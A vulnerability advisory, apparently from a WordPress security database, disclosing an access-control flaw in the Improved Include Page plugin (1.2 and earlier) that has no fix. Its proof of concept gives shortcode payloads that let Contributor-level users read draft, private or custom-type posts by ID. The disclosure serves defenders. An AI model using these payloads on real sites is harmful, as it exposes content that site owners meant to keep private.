How it works Pricing

Vulnerabilities

WordPress Plugins Themes Stats Submit vulnerabilities

For developers

Status API details CLI scanner

WordPress Plugin Vulnerabilities

Improved Include Page <= 1.2 - Contributor+ Arbitrary Posts/Pages Access

Description

The plugin allows passing shortcode attributes with post_type & post_status which can be used to retrieve arbitrary content. This way, users with a role as low as Contributor can gain access to content they are not supposed to.

Proof of Concept

[include-page allowtype="post" allowstatus="draft" id="131"]
[include-page allowtype="post" allowstatus="private" id="132"]

[include-page allowtype="custon-post-type" allowstatus="any" id="{ID}"]

Affects Plugins

improved-include-page

No known fix - plugin closed

References

CVE

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

Miscellaneous

Original Researcher

Francesco Carlucci

Submitter

Francesco Carlucci

Submitter website

https://carluc.ci

Submitter twitter

Verified

Yes

WPVDB ID

ab857454-7c7c-454d-9c7f-1db767961e5f

Timeline

Publicly Published

2021-11-15 (about 10 months ago)

Added

2021-11-15 (about 10 months ago)

Last Updated

2022-04-11 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin